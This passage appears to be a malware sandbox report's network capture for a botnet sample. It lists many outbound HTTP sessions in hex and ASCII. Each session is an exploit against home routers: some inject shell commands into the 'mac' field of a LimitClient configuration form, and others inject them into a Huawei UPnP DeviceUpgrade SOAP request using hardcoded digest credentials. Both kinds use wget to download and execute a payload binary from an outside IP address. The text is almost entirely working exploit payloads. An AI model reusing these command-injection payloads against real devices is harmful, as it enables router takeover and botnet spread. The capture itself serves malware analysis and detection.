                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2014192.168.2.2357090112.123.4.1928080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.437488079 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2015192.168.2.2347206201.93.166.508080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.459485054 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2016192.168.2.2340910176.72.217.2408080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.459590912 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2017192.168.2.2353938128.176.158.218080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.459633112 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2018192.168.2.2360266109.19.242.228080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.459662914 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2019192.168.2.235347868.202.11.1478080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.459686995 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2020192.168.2.233331259.25.59.1868080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.459738016 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2021192.168.2.2356106197.184.26.17137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.604372025 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2022192.168.2.2354172157.203.163.16837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.604381084 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2023192.168.2.2342656157.220.161.9037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.604401112 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2024192.168.2.2342930197.100.183.9237215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.604402065 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2025192.168.2.2355292157.181.113.9137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.604412079 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2026192.168.2.2347834197.102.124.1537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.604429007 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2027192.168.2.2356922157.207.130.3737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:12.604443073 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2028192.168.2.234047083.177.135.38080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.402529001 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
